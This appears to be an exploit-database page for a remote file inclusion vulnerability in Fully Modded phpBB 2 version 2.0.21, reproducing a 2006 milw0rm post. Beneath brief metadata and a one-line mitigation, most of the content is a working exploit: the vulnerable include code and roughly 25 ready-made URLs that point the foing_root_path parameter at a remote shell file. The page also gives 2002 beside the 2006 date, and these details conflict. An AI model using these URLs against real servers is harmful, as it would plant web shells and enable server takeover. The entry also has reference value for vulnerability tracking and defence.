Fully Modded phpBB 2 Remote File Include [PHPBB] Exploit (2)

vendor:

phpBB FM

by:

phpBBFM

7,5

CVSS

HIGH

Remote File Include

CWE

Product Name: phpBB FM

Affected Version From: 2.0.21

Affected Version To: 2.0.21

Patch Exists: Yes

Related CWE: N/A

CPE: a:phpbbfm:phpbb_fm:2.0.21

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux, Windows

2002

Fully Modded phpBB 2 Remote File Include [PHPBB] Exploit (2)

This exploit allows an attacker to include a remote file on the vulnerable server. The vulnerable code is present in the files faq.php, index.php, list.php, login.php, playlist.php, song.php, gen_m3u.php, view_artist.php, view_song.php, flash/set_na.php, flash/initialise.php, flash/get_song.php, includes/common.php, admin/nav.php, admin/main.php, admin/list_artists.php, admin/index.php, admin/genres.php, admin/edit_artist.php, admin/edit_album.php, admin/config.php, and admin/admin_status.php. The exploit is triggered by sending a specially crafted HTTP request containing the malicious code in the foing_root_path parameter.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in any file operations.

Source

Exploit-DB raw data:

##############################################################
Fully Modded phpBB 2 Remote File Include [PHPBB] Exploit (2)

##############################################################

Source Code:
   http://phpbbfm.net/support/index_fm.php
   http://kent.dl.sourceforge.net/sourceforge/phpbbfm/FM2021-4-40.tar.gz
###################################################

Vulnerable Code:_
include('includes/common.php');
$phpbb_root_path = $foing_root_path . $phpbb_root_path;
In
./faq.php
./index.php
./list.php
./login.php
./playlist.php
./song.php
./gen_m3u.php
./view_artist.php
./view_song.php
./flash/set_na.php
./flash/initialise.php
./flash/get_song.php
./includes/common.php
./admin/nav.php
./admin/main.php
./admin/list_artists.php
./admin/index.php
./admin/genres.php
./admin/edit_artist.php
./admin/edit_album.php
./admin/config.php
./admin/admin_status.php

###################################################

Exploit :
http://www.vicTim.com/[player]/faq.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/index.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/list.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/login.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/playlist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/gen_m3u.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/view_artist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/view_song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/login.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/playlist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/flash/set_na.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/flash/initialise.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/flash/get_song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/includes/common.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/nav.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/main.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/list_artists.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/index.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/genres.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/edit_artist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/edit_album.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/config.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/admin_status.php?foing_root_path=sh3ll.txt?
###################################################

Discoverd By :  020
###################################################

Special Greetings :_ Tryag-Team  &  4lKaSrGoLd3n-Team  > WwW.DwRaT.CoM & WwW.Tryag.CoM & WwW.Xp020.CoM
###################################################

# milw0rm.com [2006-10-23]